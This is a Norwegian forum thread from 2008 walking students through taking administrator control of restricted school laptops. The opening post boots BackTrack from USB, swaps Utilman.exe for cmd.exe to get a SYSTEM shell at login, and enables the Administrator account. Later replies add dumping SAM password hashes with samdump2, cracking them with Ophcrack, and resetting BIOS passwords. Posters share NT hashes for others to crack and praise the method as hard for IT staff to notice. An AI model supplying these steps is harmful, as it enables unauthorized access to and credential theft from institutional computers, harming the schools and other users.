Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  88 18005
Hei.

Jeg poster dette på vegne av alle dere som har skolepc på vgs, men har veldig mye restriksjoner brukeren deres.

Dette gjøres ved hjelp Linux.
Det vi skal bruke heter Backtrack.

Først, last ned Backtrack 3. Pass på at du tar cd image, og ikke noe annet.
Når det er ferdig nedlastet, så extracter man .iso fila med f. eks WinRAR,
og inn på en USB-Penn. (DETTE ER VIKTIG!) Hvis man brenner det på en CD, virker det ikke.

Når fila er ferdig extractet ut på USBen, skal det ligge to mapper i root folderen. Boot, og BT3. Det kan hende at de extractes i en egen mappe, så da må man legge dem ut av mappen.

Etter dette, så går du inn i boot mappa, og finner en .bat fil som heter bootinst.bat. Kjør denne. (NBNB: Ikke kjør fra hard driven i pcen, men vær sikker på at fila kjøres fra USB-penna. Eller så gjør du slik at Windows ikke kan boote neste gang du skrur på pcen.) Det denne fila gjør, er å installere en bootloader på USBen.

Når dette er gjort, slår du av pcen, putter inn USBen og trykker F8 (standard) når du accesse BIOSen. Da skal du få opp en boot meny. Funker ikke det, så prøv en annen F-knapp. Så skal det bootes fra USB hard drive. Når du har bootet, så skal du få dette bildet. Velg det uthevede valget på bildet, og klikk enter.
Backtrack begynner da å laste inn alle de nødvendige modulene og driverne for å åpnes.
Det skal logge seg selv inn, men hvis det ikke gjør det er brukernavn og passord root og toor i samme rekkefølge.

Du vil få opp en desktop som ligner litt på Windows. Så helt nederst i venstre hjørne finner du "start"-knappen. Rett til høyre for den, så er det en svart firkant. Trykk på denne. Da åpner du Shell Consolen. Det skal da stå i venstre øverhjørne: bt ~ =.
Så skal det skrives... (PS: Ta bort alle "-tegn)

1. skriv df, og trykk enter. da får du opp alle mountede HDer. Windows-HDen skal være blant disse. Se på øverste linje, og finn Mounted on. Se deretter nedover til du kommer til den linja der windows-HDen ligger. Der står det f. eks. /mnt/hda1. pass på at du velger riktig, ellers må du skrive inn alt på nytt igjen i consolen.

2. skriv: "cd /mnt" og trykk enter.
3: skriv: "cd hda1" (erstatt med det du fant ut var Windows-HD) og trykk enter.
4: skriv: "cd Windows" (pass på stor forbokstav) og trykk enter.
5: skriv: "cd System32" (pass på stor forbokstav) og trykk enter.
6: skriv: "mv Utilman.exe Utilman.old" (pass på stor forbokstav) og trykk enter. Her flytter man, og gir Utilman.exe et nytt navn. Utilman.exe er en fil der man f. eks. kan skru opp størrelsen på teksten på datamskinen og aktivere skjermtastatur.
7: skriv: "cp cmd.exe Utilman.exe" (pass på stor forbokstav) og trykk enter. Her kopierer man CMDen og kaller den Utilman.exe isteden.
8: skriv: "reboot" og trykk enter.

Når pcen starter opp, napper du ut USBen, og venter til Windows starter opp. Når du er på login screen trykker du Windowsknappen+U. Før ville dette åpnet den ekte Utilman.exe, men nå åpner den isteden CMD med systemrettigheter.

Det er nå magien begynner. Alle PCer med Vista kommer med en deaktivert Administratorbruker. Det er denne brukeren som blir brukt når man høyreklikker på noe og trykker Kjør som Administrator.

Men i hvert fall. I CMDen skriver du:
1: skriv: "net user administrator *" og trykker enter. Da kommer det opp en beskjed om å skrive inn et ønske passord for Administrator. (NBNB: Det du skriver blir ikke synlig i form av stjerner eller noe som helst, så ikke begynn å lur på hvorfor du ikke ser noe.) Når du har skrevet inn det ønskede passordet, trykker du enter og skriver det en gang til og trykker enter. Det skal da stå Kommandoen er fullført. Hvis ikke må du prøve på nytt.

2: skriv: "net user administrator /active:yes" og trykk enter. Her aktiverte vi Administratorbrukeren. Da skal det stå Kommandoen er fullført. Hvis ikke, må du prøve på nytt. Funket det, så lukker du bare CMDen.

Så er det bare å kose seg med sine nyvunne administratorrettigheter.

Håper dette har vært til hjelp for deg. Skulle det oppstå noen problemer, så er det bare å spørre

KAKEFARMER
Sist endret av meitemark; 10. desember 2008 kl. 15:31. Grunn: skrivefeil i instruks
God førstepost! Passer meg ypperlig ettersom jeg ikke har tilgang på annet enn skolepc i helgene
Sitat av onTop
God førstepost!
Vis hele sitatet...
Takk skal du ha ^^
Sist endret av Kakefarmer; 19. september 2008 kl. 21:15.
Sikkerhetsklarert
Fin guide. Viste ikke at det var en deaktivert admin konto på vista. KP utdelt.

Men dette kunne man vel gjort med en hvilketsomhelst live cd?
Sitat av Pjukern
Fin guide. Viste ikke at det var en deaktivert admin konto på vista. KP utdelt.

Men dette kunne man vel gjort med en hvilketsomhelst live cd?
Vis hele sitatet...
Vil tro det, men har så langt bare prøvd med BackTrack. Men det er mest fordi jeg liker BackTrack
På våres skolepcer er det passord på bios, så får ikke skiftet boot order. Noe vei rundt det eller?
Noe jeg lurer veldig på er om noen har fått ut passordet fra skolepcene i Hordaland i år?
Selv har jeg ikke det nye på min, så har ikke fått hentet ut SAM filen. Men, om noen kunne gjort det, hadde det vært koselig om du kunne sendt den!
http://home.eunet.no/pnordahl/ntpasswd/bootdisk.html

Kopier til USB, boot opp, wipe adminpassordet og that's it. Ti ganger lettere en metoden som er beskrevet her, og funker minst like bra.
Sitat av loathsome
http://home.eunet.no/pnordahl/ntpasswd/bootdisk.html

Kopier til USB, boot opp, wipe adminpassordet og that's it. Ti ganger lettere en metoden som er beskrevet her, og funker minst like bra.
Vis hele sitatet...
Om du faktisk har fått fjernet bios passordet da..
Ellers er du ingen vei.
Sitat av loathsome
http://home.eunet.no/pnordahl/ntpasswd/bootdisk.html

Kopier til USB, boot opp, wipe adminpassordet og that's it. Ti ganger lettere en metoden som er beskrevet her, og funker minst like bra.
Vis hele sitatet...
Her er det snakk om en metode som ITavdelingen på de fleste skoler ikke vet særlig mye om. Med andre ord, en metode som er lett å skjule. Noe som er veldig hendig skulle du levere PCen inn på reparasjon og ITavdelinga prøver å logge seg på sin adminbruker

Hvis jeg ikke misforsto deg, så ville de ikke ha kommet seg inn på egen adminbruker... Og det ville skapt mistanke...
med fruktkjøtt.
Tias's Avatar
Crew

Kode

cp cmd exe Utilman.exe
skal være

Kode

cp cmd.exe Utilman.exe
right?
Sist endret av Tias; 20. september 2008 kl. 02:13.
Hvis du skulle være interessert i å hante ut SAM-fila, så gjør slik.
Etter å ha lastet ned BackTrack, går du hit og laster ned fila. Den legger du i BT3/modules mappa.
Deretter følger du guiden fram til og med trinn 5.

Deretter gjør du slik:
6: skriv: "cd config" og trykk enter.
7: skriv: "ls" og trykk enter. Du får nå opp en liste med de filene som ligger i denne mappa. sjekk at SAM og SYSTEM ligger der.
8: skriv: "samdump2 -o ~/winhashes.txt system SAM" og trykk enter. Dette dumper SAM-fila, og legger den i "Home Directory." Kopier den over til minnepenna. Dumpen er i det såkalte pwdump-formatet.
9: skriv: "reboot" og trykk enter.

Så laster du ned f. eks. Ophcrack som er et program som dekrypterer disse filene. Og vips, så har du passordet til skoleadmin...

Sitat av Tias

Kode

cp cmd exe Utilman.exe
skal være

Kode

cp cmd.exe Utilman.exe
right?
Vis hele sitatet...
Yepps...

Sorry for evt. TYPOS

Skal prøve å rette dette opp så fort som mulig.
Sitat av moosh
På våres skolepcer er det passord på bios, så får ikke skiftet boot order. Noe vei rundt det eller?
Vis hele sitatet...
Tja, det kommer vel an på hvilken type pc, men de aller fleste hovedkort har en liten jumper setting for å slette bios passordet. Jeg vet ikke hvorvidt dette stemmer med laptop, men det skader ikke å sjekke(Da mener jeg søk på modellen og noe som "reset bios jumper".). Hvis ikke kan du bare jokke ut bios batteriet. Sist gang jeg lekte meg med en maskin som hadde bios passord fant jeg bare jumperen og resettet passordet.
Hvis det er Lenovo r61 fra hordaland kan du prøve med blankt bios pwd, det funket her

det funket også å bare åpne cmd, lage ny bruker med adminrigths etter å ha stoppet kix32 filen som lå i oppstart og kjørte begrensninger
mye lettere med "Login Now"
jeg trenger litt hjelp på den her ; )
når jeg skriver "samdump2 -o ~/winhashes.txt system SAM" sier den bare til meg at
samdump2 1.1.1 by objectif-securite.ch
usage: samdump2 samhive keyfile
bt config # _

åså sitter jeg fast : /

prøvd den untilman metoden å : ) da får jeg :
mv: cannot stat utilman.exe : no sutch file or directory" : /


noe mer som trengs å vite for å få hjelp?
Sitat av tuxe
jeg trenger litt hjelp på den her ; )
når jeg skriver "samdump2 -o ~/winhashes.txt system SAM" sier den bare til meg at
samdump2 1.1.1 by objectif-securite.ch
usage: samdump2 samhive keyfile
bt config # _

åså sitter jeg fast : /

prøvd den untilman metoden å : ) da får jeg :
mv: cannot stat utilman.exe : no sutch file or directory" : /


noe mer som trengs å vite for å få hjelp?
Vis hele sitatet...
Først når det gjelder samdump, må du laste ned og legge inn samdump2. Det ligger link sammen med infoen om hvordan dette gjøres. (MERK: Linkens tekst er "hit") Hvis du har gjort dette, så skal det skrives slik: samdump2[MELLOMROM]-o[MELLOMROM]~/winhashes.txt[MELLOMROM]system[MELLOMROM]SAM (prøv evt. SYSTEM i store bokstaver)

Og når det gjelder Utilman.exe må det skrives med stor U. Også ligger den i System32-mappa. Skulle det fortsatt være problemer er det bare å PMe meg, så kan vi se om vi finner en løsning.

Sitat av Repulsed
mye lettere med "Login Now"
Vis hele sitatet...
Det her var ment som en tråd for å informere om denne metoden, så "mye lettere"-poster mener jeg at er bare irriterende...
joda jeg har gjort alt som du har skrevet ; )
der jeg sitter fast har jeg ikke bare prøvd 1 gang , men kanskje på 5-10 forskjellige måter med store å små bokstaver ;P

fikk høre at dem har gjort en ny vri her på skolen å cryptert sam å system sammen.
etter at halve skolen ble admin:P

flere metoder ? med backtrack?
eller er den så å si helt "tettpakka"?
Bigger than Jesus
Sgt. Pepper's Avatar
På Windows kan man vell bare boote opp med programmet ophcrack? da finner man ut Admin passordet
den fant ikke det med ophcrack heller...
den fant noe NT hash
6acd62880c2e4fce6459d04c754339c1
men da den cracka fant den ingenting... mulig jeg må adde noe til ophcrack?
er sån livecd jeg boota fra minnepenn ;P
NThash kan du glemme å knekke hvis det ikke er et ordbok-ord dog.

LMhash derimot kan fint dekodes visstnok.
Ikke helt enig. Men lmhashen er mye lettere, tar kortere tid, mindre tabeller. Har knekt nt-hash her hjemme som ikke bare besto av ordbokord, men om det er Mye tall og tegn kan det by på problemer bare med ophcrack cdèn ja
såå.. noen som har forslag til hvordan jeg skal gjøre ?
er liksom ikke så flink med sån her :P
gjør som han andre her og post saminside fila :-) pwdump format.
Sitat av tuxe
såå.. noen som har forslag til hvordan jeg skal gjøre ?
er liksom ikke så flink med sån her :P
Vis hele sitatet...
Er ikke uber selv, prøvde med cain&abel, fant ikke pw etter nt nå engang (lokalt) Men det er folk på forumet med god peil og store tabeller, kanskje Ranvik kan hjelpe deg ?

edit: sist brukte jeg bare ophcrack..
ranvik beat me to it..
Sist endret av pidget; 3. oktober 2008 kl. 11:49.
Backtrack (3) er nokså genialt med at den har en del funksjoner ikke "normale" distroer har!
Nyttig, men IT fyren vår vet om dette og har sperret det så vi ikke kan boote fra cd
Sitat av Ludolfn
Nyttig, men IT fyren vår vet om dette og har sperret det så vi ikke kan boote fra cd
Vis hele sitatet...
Les tråden, greia at man skal boota fra en minnepenn. Har IT ansvarlig sperret for dette også?
Bare et spørsmål, hva tror dere skolen hadde gjort hvisde hadde merket dette? :P

Og en annen ting, hva skal man egentlig med adm. rettigheter på skole pc-en?

(må forresten lage en ny tråd ang. et problem jeg har med skole pc-en)
Sitat av Zarfax92

Og en annen ting, hva skal man egentlig med adm. rettigheter på skole pc-en?
Vis hele sitatet...
Hva skal man ikke med admin rettigheter på skole pc-en? Meg bekjent er det håpløst mange begrensninger på skole pc-er, i tilleg til at man ikke får admin bruker - det sier seg selv at det da er vanskelig å få instalert egne programmer, eller i det hele tatt gjort noe som helst annet enn det maskinen er "designet" for, nemlig skolearbeid og enkel surfing i IE.

Skolen kan forøvrig enkelt sette passord på bios for å forhindre denne metoden.
Hehe, såklart er det sykt irriterende å ikke kunne innstallere programmer, men det fins jo enkle måter å gå rundt dette på, og det hadde jo vært litt kjipt å miste pcen bare på grunn av noen adminrettigheter :P
noen som gidder å finne ut passordet på nt-hashen min eller? Har prøvd mange ting nå men får det ikke til.

NT-Hash EE288C706EA266FC5371EE1354C82FBA

kan også sende pwdump fil på e-post eller noe
Sitat av Colto
noen som gidder å finne ut passordet på nt-hashen min eller? Har prøvd mange ting nå men får det ikke til.

NT-Hash EE288C706EA266FC5371EE1354C82FBA

kan også sende pwdump fil på e-post eller noe
Vis hele sitatet...
du kan jo poste pwdump her da, så folk gidder og finne ut hash, password blir public uansett.

NB: du kan endre bruker navn, men ikke endre id'en
Nå har jeg lagt til filen
Er det lett for skolen å merke dette? Hva tror dere de gjør hvis de merker det? :P
kan være alvorlig hvis du hjelper mange andre på skolen med å få admin rettigeter. Det var en som knakk passordet på skolen min og spredde det, som nesten fikk nedsatt og utvisning. Men føkker du opp BARE din pc vil du komme unna med en anmerkning eller kansje bare en advarsel.

Dette er riktig nok min skole da
Ok, hadde vært litt kjipt å miste pcen ofc. Kanskje jeg skal teste dette en dag
Er det noen som kan gi meg link til rainbow tables som gir meg Mixalpha, numeric og symbol? Har lett over alt, men finner ikke en drit
for å resette bios-passord:
gå inn på cmd (start,run,cmd)
skriv følgende:
debug
o 70 2E (første tegnet er en bokstav)
o 71 FF (første tegnet er en bokstav)
quit

thats it
Til dere alle sammen, jeg vil anbefale dere og ikke skrive:
net user administrator *
dette vil sette administratorpassordet til noe annet, hvis dere da skulle få noe problemer med pc-en i senere tid vil ikke IT-avdelingen kunne gjøre noe med det fordi dere har endret brukeren de bruker for å fikse pc-en deres! :S
Bruk heller
net user nybruker nyttpassord /add
net localgroup administratorer nybruker /add

Dette vil lage en ny bruker som heter "nybruker" med passord "nyttpassord
husk at dere ikke skal logge på pc-en på domene men lokalt på pc-en
god post kakefarmer! Veldig greit å få med seg, var rett før jeg laget 2x boot på minnepennen min for å legge inn bt3 OG trinity rescue kit,men nå sparte jeg meg for 1 av mine 16GB
Jeg er veldig glad ikke _jeg_ er admin på en skole nå.. slike poster som dette er to ting samtidig:
1. veldig lærerike og interessante
men også...
2. et helvete for de som faktisk må reparere datamaskinene fordi elever selv har prøvd på slike tåpelige ting
Jobber selv på IT-avd på en vgs. Tar jo ca 30 sec med active password changer å blanke passordet på brukere inne på maskina.

Vi gir forøvrig elevene full tilgang til sin maskin.
Sitat av Fiskn
Tar jo ca 30 sec med active password changer å blanke passordet på brukere inne på maskina.
.
Vis hele sitatet...

det betyr at du ikke booter med noenting ? O.o
▼ ... noen uker senere ... ▼
Hei! Er det mulig å finne ut i ettertid om det er kjørt OPHcrack på en PC? Og er det sannsynlig at OPHcrack vil finne admin passordet på skolepcen?
Usikker på om dette er nevnt. Men bootinst.bat fila er ikke noe glad i å kjøre fullstendig ut hvis man gjør det i Vista. Ikke prøvd meg fram på forskjellige måter så vet ikke om det går med litt dilldall. Bare min erfaring hittil.
Sitat av Liquid Crystal Vis innlegg
Usikker på om dette er nevnt. Men bootinst.bat fila er ikke noe glad i å kjøre fullstendig ut hvis man gjør det i Vista. Ikke prøvd meg fram på forskjellige måter så vet ikke om det går med litt dilldall. Bare min erfaring hittil.
Vis hele sitatet...
Dette tror jeg stemmer, fordi jeg var nødt til å kjøre .bat fila fra en XP-maskin. Da funket det helt fint.
Eller kan de bare bruke en MYE enklere metode..

last ned Pc Login Now, smekk den på en cd som Boot cd..

start opp pc'n, så velger du hvilken bruker du vil åpne, å trykk ok... strat maskinen på nytt, vips du ahr en admin account
Sitat av moosh Vis innlegg
På våres skolepcer er det passord på bios, så får ikke skiftet boot order. Noe vei rundt det eller?
Vis hele sitatet...
Jupp, bare prøv alle mulige kombiansjoner eller reset bios (spør noen andre enn meg værsåsnill ), eller ta ut hdden når pcen skal boote

til dere UTEN biospassord, lag det før skolen gjør det :P

Forresten, grunnen til at noen vil ha admin rights her kan jo være fordi, som på skolen min, at man ikke engang kan endre oppløsning, og dermed koble på ekstern skjerm. I tillegg kan man ikke gå inn på kontrollpanel. wtf for en skole (beklager språket)
Sist endret av hawken07; 20. november 2008 kl. 22:51. Grunn: Automatisk sammenslåing med etterfølgende innlegg.
▼ ... noen uker senere ... ▼
Hei!

Når jeg booter fra usb'en, så kommer jeg bare til den lange lista med forskjellige ting programmet driver med. Den stopper etter hvert og pcen henger seg på Floppy disc 1.44m eller noe sånt. Noen som vet hva som er galt?

Beklager for den forrige, men allikevel, når jeg lot den gå i lang tid så sa den at den ikke fant BT3 data eller noe sånt, hva er galt? :S
Sist endret av Brendeteigen; 7. desember 2008 kl. 02:35. Grunn: Automatisk sammenslåing med etterfølgende innlegg.
▼ ... over en måned senere ... ▼
Hei, har litt problemer med og få dette til.
Laster ned filen og extracter til usb minnepennen.
Får da to mapper ene boot og andre BT3.
Går inn i mappen boot og trykker og kjører bootinst.bat.
Da får jeg denne beskjeden:

Setting up boot record for F:, wait please...
Accessing physical driver: Ingen tilgang.
Did not successfully update the MBR; continuing...
Disk F: shuld be bootable now. Istallation finished.

Red tehe information above and then press any key toy exit...

Så starter jeg opp skolepcen og veldger boot fra USB Hard Driver men skjer ikke noe.
Kan også velge å boote fra
USB CD-ROM
USB Floppy
USB SuperDisk

Men når jeg booter fra USB Hard Driver skjer det ikke noe.
Hva gjør jeg glat?

Iriterende og ikke få til. Denne skolepcen er låst på alt. Får ikke gjøre noe! Men bios har heldigvis ikke passord på seg

Vet det er litt gammel post, men er veldig kurant før meg.
Håper noen kan hjelpe meg
Tom for megabytes
AtXbYeA's Avatar
Ganske opplagt, den sier "Did not successfully update the MBR" mao har du ingen bootsektor på pennen.

Du kjører vel kanskje vista ? Og da kjører ikke scriptet som admin, da må du høyreklikke på filen og velge å kjøre den som administrator.

Ellers :
http://www.slax.org/forum.php?action=view&parentID=6241

Google er en fin fisk.